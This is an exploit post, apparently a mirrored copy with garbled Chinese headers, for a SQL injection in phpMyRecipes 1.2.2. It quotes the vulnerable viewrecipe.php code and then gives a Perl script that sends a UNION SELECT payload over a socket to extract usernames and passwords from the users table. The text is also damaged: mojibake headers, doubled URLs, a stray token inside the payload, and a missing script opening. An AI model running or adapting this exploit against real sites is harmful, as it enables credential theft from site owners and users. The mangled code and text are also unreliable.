鏍囬橈細phpMyRecipes 1.2.2 SQL Injection Exploit

浣滆 cr4wl3r http://http://www.zjjv.com//

涓嬭浇鍦板潃 http://http://www.zjjv.com///projects/php-myrecipes/files/

婕旂ず: http://http://www.zjjv.com///demo/phpMyRecipes.png

娴嬭瘯绯荤粺: Ubuntu Linux

婕忔礊椤甸潰锛 viewrecipe.php

#

# $r_id = $_GET['r_id'];

#

# if (! ($result = mysql_query("SELECT

# name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {

# dberror("viewrecipe.php", "Cannot select recipe");

# }

#

# http://http://www.zjjv.com// /[path]/recipes/viewrecipe.php?r_id=[SQLi]

#绀轰緥锛 http://http://www.zjjv.com/// |

+---------------------------------------------+

-=[X]=-

+---------------------------------------

Usage :

perl $0 <host> <path>

ex : perl $0 127.0.0.1 /phpMyRecipes/

+---------------------------------------

);

}

$target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",

PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n";

print "[+] Please Wait ...\n";

print $sock "GET $target HTTP/1.1\n";

print $sock "Accept: */*\n";

print $sock "User-Agent: BastardLabs\n";

print $sock "Host: $host\n";

print $sock "Connection: close\n\n";

sleep 2;

while ($answer = <$sock>) {

if ($answer =~ /<B>(.*?)<\/B>/) {

print "\n[+] Getting Username and Password [ ok ]\n";

sleep 1;

print "[+] w00tw00t\n";

print "[+] Username | Password --> $1\n";

exit();

}

}

print "[-] Exploit Failed !\n";